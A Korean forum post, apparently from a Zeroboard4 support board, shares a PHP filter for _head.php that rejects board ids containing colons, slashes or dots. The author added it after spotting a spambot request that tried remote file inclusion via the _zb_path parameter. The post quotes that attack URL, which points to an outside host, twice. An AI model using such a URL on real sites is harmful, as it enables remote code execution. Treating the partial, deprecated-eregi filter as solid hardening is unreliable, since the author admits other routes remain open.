제로보드4는 공식적으로 더 이상 개발되지도 배포되지도 않습니다.
제로보드4를 사용하기 위한 팁보다 제로보드4를 안전하고 무사히 다른 툴로 이전하는 팁들을 게재해주시면 감사하겠습니다.
시간이 오래 지난 만큼 오래된 프로그램은 보안 및 사용성에 있어 문제가 많으니 이해 바랍니다.
글 수 4,549
![[레벨:2]](http://www.xpressengine.com/modules/point/icons/xe_v3/2.gif "포인트:695point (74%), 레벨:2/30"){kind=icon}
짙은어둠스팸봇이 들어온 후에 접속자의 입력방식을 봤더니.
/bbs/zboard.php?id=Picture//?_zb_path=http://ipteam.net//copyright.txt????
위와 같은 주소의 형태를 보이더군요.
즉, id 값으로 전혀 이상한 값이 들어가 있었습니다.
그래서 착안해 보았습니다.
제로보드의 _head.php 에 '//게시판 $id 체크' 밑을 다음과 같이 수정했습니다.
// 게시판 $id 체크
if(!$id&&$_zboardis) Error("게시판 이름을 지정해 주셔야 합니다.<br><br>예) zboard.php?id=이름",""); // 게시판 이름 체크
if(eregi(":", $id)) Error("Not Valid");
if(eregi("/", $id)) Error("Not Valid");
if(eregi("\.", $id)) Error("Not Valid");
즉 $id 값에 :, /, \ 란 문자가 포함되어 있으면 에러를 호출하게 하였습니다.
뭐 다른 방법으로 들어오는 것은 어쩔수 없다해도 일정부분 차단이 되는 듯합니다.
/bbs/zboard.php?id=Picture//?_zb_path=http://ipteam.net//copyright.txt????
위와 같은 주소의 형태를 보이더군요.
즉, id 값으로 전혀 이상한 값이 들어가 있었습니다.
그래서 착안해 보았습니다.
제로보드의 _head.php 에 '//게시판 $id 체크' 밑을 다음과 같이 수정했습니다.
// 게시판 $id 체크
if(!$id&&$_zboardis) Error("게시판 이름을 지정해 주셔야 합니다.<br><br>예) zboard.php?id=이름",""); // 게시판 이름 체크
if(eregi(":", $id)) Error("Not Valid");
if(eregi("/", $id)) Error("Not Valid");
if(eregi("\.", $id)) Error("Not Valid");
즉 $id 값에 :, /, \ 란 문자가 포함되어 있으면 에러를 호출하게 하였습니다.
뭐 다른 방법으로 들어오는 것은 어쩔수 없다해도 일정부분 차단이 되는 듯합니다.
![[레벨:6]](http://www.xpressengine.com/modules/point/icons/xe_v3/6.gif "포인트:3395point (13%), 레벨:6/30"){kind=icon}
아가페